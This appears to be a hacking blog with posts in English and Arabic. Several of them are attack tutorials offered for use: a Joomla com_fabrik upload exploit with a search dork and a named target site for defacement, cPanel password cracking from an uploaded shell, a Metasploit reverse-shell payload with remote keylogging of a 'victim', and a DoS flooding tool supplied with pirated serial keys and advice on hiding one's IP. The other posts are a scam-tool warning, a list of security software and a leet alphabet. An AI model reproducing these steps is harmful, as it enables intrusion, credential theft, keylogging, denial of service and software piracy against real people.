vendredi 11 avril 2014

Joomla Component (com_Fabrik) Remote Deface page Upload Vulnerability




Google Dork : inurl:index.php?option=com_fabrik
or
index.php?option=com_fabrik

 
Exploit:
/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1


Sample:
http://www.usatovip.it/= add exploit

now it looks like :
http://www.usatovip.it/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1

Browse and upload your deface page ,When error appears just ignore it

You will access your deface page here : 

http://VictimeSite.com/media/yourdeface.html
Then You Can Find your File here :

http://www.VictimeSite.com/media/yourdeface.html




jeudi 6 mars 2014

How to Crack C-Panels from The Shell !

HELLO Every Body 



 Ok now lets talk about something different today.. many hackers just deface index pages for fame, many wants to get the hold on the server… some are genious and some are script kiddies… what if you got access to the server with limited permissions… and you have targeted a website on that server… what would you do at that time…!
And the real game STARTS NOW… we will learn how to crack a Cpanel password for all the websites that are hosted on that server or the particular one with the help of this method “Cpanel Cracking/Hacking!“…!!

First of all…we need a cpanel cracking shell on that server to crack the passwords of the websites that are hosted on that server!!
Step 1

First we have to upload cpanel.php cpanel cracking shell on that server to start our journey…!!

Step 2

Second thing we need, is the mother of this method!! Yes…we need Usernames of the websites and a Extremely capable password dictionary to crack!!
Now lets start…

Grab all the usernames of websites hosted on the website with the help these commands

1- “ls /var/mail”
2- “/etc/passwd”





















Now you will see all the usersnames of the websites and the password list you have provided! Just press the “Go” button and just wait and watch your success!





















If you have supplied strong enough password list then you will the a good response from the server
like this “Cracking success with username “ABC” with password “XYZ”




















else it will show you negative response like this Please put some good passwords to crack username “ABC” 
Inshort… the success of cracking usernames is directly proportional to the password dictionary provided  ;)


PG-H



jeudi 30 mai 2013

إحذر من بعض البرامج المساعدة على الإختراق.







السلام عليكم ورحمة الله وتعالى وبركاته 

في هذه المقالة سوف أتحدث لكم عن موضوعا لايعلمه الكثيرين وهو البرامج 
التي تساعدك على الإختراق مثلا 
نجد في بعض منتديات أو مدونات عنوان تحت 
أقوى برنامج لإختراق حسابات على الفيسبوك ....
قبل الدخول في الموضوع أريد أن أقول بأن هذه البرامج قد تتعدد خدماتها .
هذا مشكل يقع فيها الكثير من الأشخاص الذين يقومون بإدخال تلك البرامج 
إلى حواسبهم . فبعد إدخال ذالك الملف إلى حاسوبك قد لا يقدر برنامج مكافح الفيروسات لديك بتعرف عليه
لأنه يكون مشفر بقوى .
و في تلك الحالة سوف تصبح أنت هو الضحية .
وهناك نوع آخر من البرامج التي تقول لك يجب عليك أن تدخل معلوماتك 
الشخصية مثل الإيميل و كلمة السر الخاصة ببريدك الإلكتروني لكي نستطيع أن نخترق لك الشخص الذي تود أن تخترق
أقول لك أنه إذا أدخلت أي معلومات شخصية عنك فسوف يتم إرسالها مباشرتا إلى مصنع ذلك البرنامج .
وبعض البرامج الأخرى تقول لك يجب عليك أن تدفع مبلغ قليل من المال لكي 
يخترق هذا الشخص المراد إختراقهولاكن فور دفع ذلك المبلغ المطلوب 
ستجد نفسك غبي في تلك اللحظة ولن يتم إختراق ذلك الشخص الذي تريد .
 والأن سوف أعطيكم بعض البرامج المخدعة 








ملاحضة :  أريد أن أنبهكم أنه لايجد لحد الآن أي برنامج لإختراق الحسابات الفايسبوك




mercredi 15 mai 2013

أهم البرامج المساعدة في الحماية من الإختراق.





أهم البرامج المساعدة في حماية جهازك من الإختراق .




1  Anti-Malware bytes

يعتبر برنامج Anti-Malware Bytesمن اهم برامج ازالة ملفات التجسس والفيروسات. برنامج Anti-Malware Bytes يقوم بمراقبة جهازك لحظة بلحظة واثناء تواجدك داخل صفحات الانترنت ليمنع اي فيروس او ملف تجسس من الدخول الي جهازك او اختراقك. لبرنامج يقوم بمراقبة جميع العمليات التى تجرى على جهازك فى الخلفية ويقوم بأيقاف أى عملية ضارة منها فورا والقضاء على مصدرها.
لتحميل البرنامج من الموقع الأصلي من هنا .

2 : USB DISK SECURITY


 يعتبر هذا البرنامج من أهم البرامج التي تسعدك في حماية حاسوبك من مخاطر مفاتح usb
 فور ربطها مع الحاسوب يعطيك نتائج بحثه عن الفيروسات داخل ذلك المفتاح
ومن خلاله يمكنك أن تضع كلمة سر لمنافذ المفاتح الusb و فحص جميع المواقع التي تشك في سلامتها .
لتحميل البرنامج من هنا.


3 : Anti Logger
هذا البرنامج يوفر لك حماية من بعض البرامج الضارة والتي تسمى ب keylogger و التي تشكل خطرا كبيرا على لوحة المفاتيح (keyboard) حيث يقوم برنامجAnti-Logger بتشفير ما تقوم بكتابته ومنع keylogger من الدخول إلى حاسوبك . 
لتحميل البرنامج من موقعه الأصلي من هنا.


4 : Instant Lock

إذا كان حاسوبك مشترك بينك وبين شخص آخر فإنني أنصحك بهذا البرنامج الذي يحمي لك ملفاتك بكلمة سر هو برنامج سهل و أصي به للأشخاص الذين يريدون حماية ملفاتهم من التجسس عليها من طرف أشخاص آخرين ولكن عليك أحذرك بأن تضع كلمة سر سهلة لأنه إذا نستها فهذا يعني ضياع تلك الملفات التي أصبحت محمية بكلمة سر والبرنامج سهل و فيه نسختين الأولى مجانية والثانية غير مجانية .
لتحميل البرنامج من هنا. 


وفي الأخير شكرا لكم ولي دعمك لي وإنشاء الله ترقبوا الموضوع القادم والسلام . وكان معكم أنس خيرالدين




















mercredi 20 mars 2013

تعلم لغة leet الخاصة بالهاكر.











 السلام عليكم كلنا نرى افلام مقاطع فيديوا فيها
 بعض الاكواد المشفرة التي لا يدركها سوى الهاكرز نعم إنها لغة الهاكرز والتي تنقسم إلى ثلات مستويات لن اتحدث عن بعض المستويات المتقدمة (إنشاء الله في موضوع ثاني ) من تقديمي اليوم سأتحدث عن المستوى الاول وهي اسهل لغة في عالم الهاكرز . فيكم من سيسألني ماهي فائدة الكتابة بتلك الاكواد او مذا يستفيد الهاكرز عندما يكتبون بتلك اللغة ؟ اقول للك حبيبي هو الهذف يكون إما لارسال دعوة لكافة الهاكرز بإختراق ما او تجمع ما وذالك مثلا عبر مواقع لشات حيث ان الاشخاص العادين لا يذركون مغزى تلك الرسالة او فحوها كما يمكن ان يكون فقط بالشعور بنوع من الاختلاف والتميز
 إذا امر إلى الحروف الهجائية وطريقة كتابتها بللغة الهاكينغ 
 A= 4
 B= 8
 c=(
 D=|)
 E=3
 F=|=
 G=6
 H= |-|
 I=1 ou !
 J= _|


 K=|<
 L=|_ ou 1
 M=|\/|
 N=|\|
 O=0
 P=|8 ou |*
 Q=0_
 R=2 ou |2
 S=5
 T=7
 U= |_|
 V=\/
 W=\/\/
 X=%
 Y=Y
 Z=2


ANASS KHEIREDDINE To You Hajar


lundi 18 mars 2013

Exploiting Windows 7 Remote Computer Using Metasploit Framework.







Today I’ll tell u how to exploit any remote machine of Windows 7..
The steps are as follows..
First of all , start backtrack 5 and type “startx” to start the GUI mode:
root@bt:~#startx

The by default username and password is
Username: root
Pass: toor

To know your Local Ip. Opening up a konsole (on the bottom left of taskbar) and typing in:
root@bt:~#ifconfig

Launch msfconsole by going to Applications>>Backtrack>>Exploitation Tools>>Network Exploitation Tools>>Metasploit Framework>>msfconsole


Let’s now create an executable file which establishes a remote connection between the victim and us, using the meterpreter payload.
Open another shell window

root@bt:/opt/framework3/msf3# ./msfpayload windows/meterpreter/reverse_tcp LHOST=xxx.xxx.xxx.xxx LPORT=anyportno x > /root/reverse_tcp.exe
Your local IP is the one you noted earlier and for port you could select anything.

You will get like this:
Also, now on your backtrack desktop, you would be seeing a reverse_tcp.exe file.
Now open the 1st shell window with msfconsole in it.
msf >
Type the following:
msf > use exploit/multi/handler

msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST xxx.xxx.xxx.xxx
LHOST => xxx.xxx.xxx.xxx

msf exploit(handler) > set LPORT 4444
LPORT => 4444

All the connections are done. You have already made an executable file which makes a reverse connection to you.
And now, you have set the meterpreter to listen to you on port 4444.
The last step you have to do now, is to type in “exploit” and press enter,
msf exploit(handler) > exploit

You would see a meterpreter prompt like this
meterpreter >
Type in ps to list the active processes
meterpreter > ps
Search for explorer.exe and migrate to the process


meterpreter > migrate 2028
[*] Migrating to 2028…
[*] Migration completed successfully.
meterpreter >

Type in the following:
meterpreter > use priv

Now, if you want to start the Keylogger activity on victim, just type keyscan_start
Now, if you want to go to the victim’s computer,
Jus type shell
meterpreter > shell
Process 844 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>

You would now be having a command prompt,
Type in whoami, to see the computer’s name of victim :
C:\Windows\system32>whoami
whoami
kyrion-pc\kyrion
C:\Windows\system32


Let’s suppose you want to start a notepad on the victim’s computer.
Type in:
Let’s say the victim has typed in anything on his computer.
Just type exit, to return to meterpreter.
Now type in keyscan_dump, to see all the typed keystrokes :
meterpreter > keyscan_dump
Dumping captured keystrokes…


And Thanks for listening this tutorial
ANASS KHEIREDDINE



vendredi 8 mars 2013

كيف تصنع متصفح بسيط ؟




السلام عليكم ورحمة الله و تعالى وبركاته

 VISUAL BASIC 2010 في هذه التدوينة سوف أقدم لكم شرح حول كيف تصنع متصفح بسيط عبر برنامج

لصنع متصفح نحتاح إلى برنامج
VISUAL BASIC 2010
يمكنك تحميله من على الرابط أسفله 





أرجو أن أكون قد وفقة في الشرح


























lundi 4 mars 2013

DOSHTTP 2.5.1






السلام عليكم ورحمة الله وبركاته

اليوم معانا DoSHTTP 2.5.1 + SERIALS

البرنامج بيعمل فلود لاى موقع ويقوفه تماما بثوانى وسهل التعامل

الاول هنروح تحمل النسخه DoSHTTP 2.5.1 من الموقع الرسمى http://www.socketsoft.net



اظن البرنامج بسيط مش محتاج لشرح

ثانيا والاهم بعد التنصيب افصل الانترنت قبل متحط السيريال للتفيعل وانتظر حتى يتم التفعيل

وايضا تشغيل البرنامج وانتا فاصل الانترنت وتنتظر حتى يكمل البحث عن الابديت وتشغل الانترنت

أخيرا السيريال

DH10A-0064-4004-04E8-4E6F-E4BE

DH10A-0064-4005-0529-16EB-165E

DH10A-0064-4025-0500-2110-3D6F




ملحوظه مهمه : البرنامج هيستخدم الايبى بتاعك فى هجمات الفلود ع المواقع وعشان تبعد نفسك عن المشاكل مع المواقع الكبيرة حاول تستخدم vpn او بروكسى لتغير الايبى الخاص بيك

الموضوع اهداء للجميع

تحياتى لكم

والسلام عليكم ورحمة الله وبركاته